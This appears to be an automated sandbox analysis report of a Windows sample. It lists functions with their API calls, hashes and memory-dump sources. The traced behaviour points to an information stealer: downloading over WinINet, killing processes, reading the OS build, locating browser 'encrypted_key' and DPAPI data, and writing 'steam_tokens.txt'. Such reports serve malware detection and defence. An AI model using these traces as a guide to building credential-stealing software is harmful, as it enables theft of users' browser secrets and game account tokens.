                                • Instruction Fuzzy Hash: C2F01D75640208FFD7109BB59C4DFFA7B6CEB45755F100155FF09E6280EAB05A44C7A0
                                Function 006C9DE0 Relevance: 12.2, APIs: 5, Strings: 3, Instructions: 183memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • memcmp.MSVCRT(?,v20,00000003), ref: 006C9E04
                                • memcmp.MSVCRT(?,v10,00000003), ref: 006C9E42
                                • LocalAlloc.KERNEL32(00000040), ref: 006C9EA7
                                  • Part of subcall function 006E71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006E71FE
                                • lstrcpy.KERNEL32(00000000,006F4C48), ref: 006C9FB2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpymemcmp$AllocLocal
                                • String ID: @$v10$v20
                                • API String ID: 102826412-278772428
                                • Opcode ID: 00d41ed17307c79e6d5102f3ba2208256697a40ffe62288737dff7b011c4a361
                                • Instruction ID: 3b3a092f52f081df03ae0017fc75f076336b99bae43341a56a06408398bf297c
                                • Opcode Fuzzy Hash: 00d41ed17307c79e6d5102f3ba2208256697a40ffe62288737dff7b011c4a361
                                • Instruction Fuzzy Hash: 2E518B71A1020A9BCB10EFA6DC89FAE77A6EF40314F15406CFD59EB251DA70ED458BA0
                                Function 006C5640 Relevance: 12.1, APIs: 8, Instructions: 112networkmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 006C565A
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C5661
                                • InternetOpenA.WININET(006ECFEC,00000000,00000000,00000000,00000000), ref: 006C5677
                                • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 006C5692
                                • InternetReadFile.WININET(?,?,00000400,00000001), ref: 006C56BC
                                • memcpy.MSVCRT(00000000,?,00000001), ref: 006C56E1
                                • InternetCloseHandle.WININET(?), ref: 006C56FA
                                • InternetCloseHandle.WININET(00000000), ref: 006C5701
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                • String ID:
                                • API String ID: 1008454911-0
                                • Opcode ID: 4aa004d3fa6ef08fdbd7c30e697b1b67e50cdd387f7bfe791bffc8ae1b15ea54
                                • Instruction ID: d90778e996a441daee2c7220ceffd7d31f05a0ee376dc5f738846214b69f6459
                                • Opcode Fuzzy Hash: 4aa004d3fa6ef08fdbd7c30e697b1b67e50cdd387f7bfe791bffc8ae1b15ea54
                                • Instruction Fuzzy Hash: 9B417F70A00605DFDB14CF65DC88FAAB7B5FF84314F14816DE5099B3A0D771A981CBA4
                                Function 006E4740 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 006E4759
                                • Process32First.KERNEL32(00000000,00000128), ref: 006E4769
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E477B
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006E479C
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 006E47AB
                                • CloseHandle.KERNEL32(00000000), ref: 006E47B2
                                • Process32Next.KERNEL32(00000000,00000128), ref: 006E47C0
                                • CloseHandle.KERNEL32(00000000), ref: 006E47CB
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: be8bba669652fe72219d9a60557b44d8fd85854ab92ed17baf9acc7891f50b45
                                • Instruction ID: 4ac9f4a173b18af0f42ef0ddceceb09c4132944d5e9519df3dfb383e6f718202
                                • Opcode Fuzzy Hash: be8bba669652fe72219d9a60557b44d8fd85854ab92ed17baf9acc7891f50b45
                                • Instruction Fuzzy Hash: E001B171602714AFEB205B719C89FFA77BDFB48752F000181FA49E5280EF709D90CAA0
                                Function 006D83E0 Relevance: 10.6, APIs: 7, Instructions: 147stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(00000000), ref: 006D8435
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D846C
                                • lstrlen.KERNEL32(00000000), ref: 006D84B2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D84E9
                                • lstrlen.KERNEL32(00000000), ref: 006D84FF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006D852E
                                • StrCmpCA.SHLWAPI(00000000,006F4C3C), ref: 006D853E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c90c81a0a637822c87bb15606ce2af882e68629931f5b5e59736d3e1b4c9949f
                                • Instruction ID: f7a339bacf2fd49f4771b8247cdb968182f50b4cb81bcef3b5ffcfa6830ba8a5
                                • Opcode Fuzzy Hash: c90c81a0a637822c87bb15606ce2af882e68629931f5b5e59736d3e1b4c9949f
                                • Instruction Fuzzy Hash: 80515F759002069FCB64DF69D899AAAB7F6EF48300F14845EEC46DB345EF30D941CB90
                                Function 006E2910 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006E2925
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E292C
                                • RegOpenKeyExA.ADVAPI32(80000002,00F0B880,00000000,00020119,006E28A9), ref: 006E294B
                                • RegQueryValueExA.ADVAPI32(006E28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 006E2965
                                • RegCloseKey.ADVAPI32(006E28A9), ref: 006E296F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: CurrentBuildNumber
                                • API String ID: 3225020163-1022791448
                                • Opcode ID: 0e98a82438a44a82a161f295a2125df1859372eea060fd6c5a27ea745f3e7cdd
                                • Instruction ID: afd251aa6bf1ade88a6dfc5c8895864c7ba7a0726a53829511d51c8392b86ee4
                                • Opcode Fuzzy Hash: 0e98a82438a44a82a161f295a2125df1859372eea060fd6c5a27ea745f3e7cdd
                                • Instruction Fuzzy Hash: B3019A75600319AFD714CBA19C59FFB7BADEB88715F200098FE8597241EA715A04C7A0
                                Function 006E2880 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006E2895
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006E289C
                                  • Part of subcall function 006E2910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 006E2925
                                  • Part of subcall function 006E2910: RtlAllocateHeap.NTDLL(00000000), ref: 006E292C
                                  • Part of subcall function 006E2910: RegOpenKeyExA.ADVAPI32(80000002,00F0B880,00000000,00020119,006E28A9), ref: 006E294B
                                  • Part of subcall function 006E2910: RegQueryValueExA.ADVAPI32(006E28A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 006E2965
                                  • Part of subcall function 006E2910: RegCloseKey.ADVAPI32(006E28A9), ref: 006E296F
                                • RegOpenKeyExA.ADVAPI32(80000002,00F0B880,00000000,00020119,006D9500), ref: 006E28D1
                                • RegQueryValueExA.ADVAPI32(006D9500,00F20388,00000000,00000000,00000000,000000FF), ref: 006E28EC
                                • RegCloseKey.ADVAPI32(006D9500), ref: 006E28F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 5ee185ddefb7079f865c87231538006bed735e992fc715daa9b08199a7114cb3
                                • Instruction ID: 003c8248cadf155063858eee0f4506df7c555bceb9df792bcfc0819d9854cd91
                                • Opcode Fuzzy Hash: 5ee185ddefb7079f865c87231538006bed735e992fc715daa9b08199a7114cb3
                                • Instruction Fuzzy Hash: BA018F75600209AFDB149BB5AC49FBA776EFB84315F100158FE08D2250DA705944C7A0
                                Function 006C71F0 Relevance: 9.1, APIs: 6, Instructions: 142memorylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 006C723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 006C7279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 006C7280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 006C72C3
                                • HeapFree.KERNEL32(00000000), ref: 006C72CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 006C7329
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: 7a2943a10be142786de70e760ce436ef1bddc4c7562c70240392117c6b1fab5b
                                • Instruction ID: 2344191de5bc5d4969e1506b235ad5b4b1a3fdfa855d7e130fd987ca12bc3b64
                                • Opcode Fuzzy Hash: 7a2943a10be142786de70e760ce436ef1bddc4c7562c70240392117c6b1fab5b
                                • Instruction Fuzzy Hash: FC413871A05606DBDB20CFA9E884FBAB3EAFB88305F1445ADEC4DC7310E635E940DA50
                                Function 006C9C70 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 124memorystringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 006C9CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 006C9CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 006C9D03
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: 8efe6257b2f68bd66efe586c1791fb19c30f1d16d9b8d794fe07189d5443cfae
                                • Instruction ID: d56969f9c2b8a72c9e08879006c5d6efcf65ec210c561c2268cc53082598de76
                                • Opcode Fuzzy Hash: 8efe6257b2f68bd66efe586c1791fb19c30f1d16d9b8d794fe07189d5443cfae
                                • Instruction Fuzzy Hash: 2A418D71A0060A9BCB25EFA6D849FFE77B6EF50304F04546DED1AA7352DA30AD00C7A4
                                Function 006DE9E0 Relevance: 9.1, APIs: 6, Instructions: 110stringCOMMON
                                Download Yara Rule
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 006DEA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 006DEA53
                                • lstrcat.KERNEL32(?,00000000), ref: 006DEA61
                                • lstrcat.KERNEL32(?,006F1794), ref: 006DEA7A
                                • lstrcat.KERNEL32(?,00F18A80), ref: 006DEA8D
                                • lstrcat.KERNEL32(?,006F1794), ref: 006DEA9F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
                                • Associated: 00000000.00000002.2221486075.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000006F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000074E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.0000000000756000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.000000000076F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221503288.00000000008F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221667933.000000000090A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.000000000090C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221685809.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2221973736.0000000000BB8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222116011.0000000000D5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2222133506.0000000000D5E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_6c0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: ff8ccb134538f101d287469ad1624b5fffc948928609e768cd71f50a261a6cf7
                                • Instruction ID: 04964eb46832af2bc22f8aa21f9dde714ba923b2d1596fe57f1453894e618ab8
                                • Opcode Fuzzy Hash: ff8ccb134538f101d287469ad1624b5fffc948928609e768cd71f50a261a6cf7
                                • Instruction Fuzzy Hash: 87416FB1A10119ABCB55EBA5DC56FFD7379FF88300F40446CBA1A9B241DE709E448B94
                                Function 006DECB0 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,006ECFEC), ref: 006DECDF
                                • lstrlen.KERNEL32(00000000), ref: 006DECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 006DED1D
                                • lstrlen.KERNEL32(00000000), ref: 006DED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 006DED52
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006C0000, based on PE: true
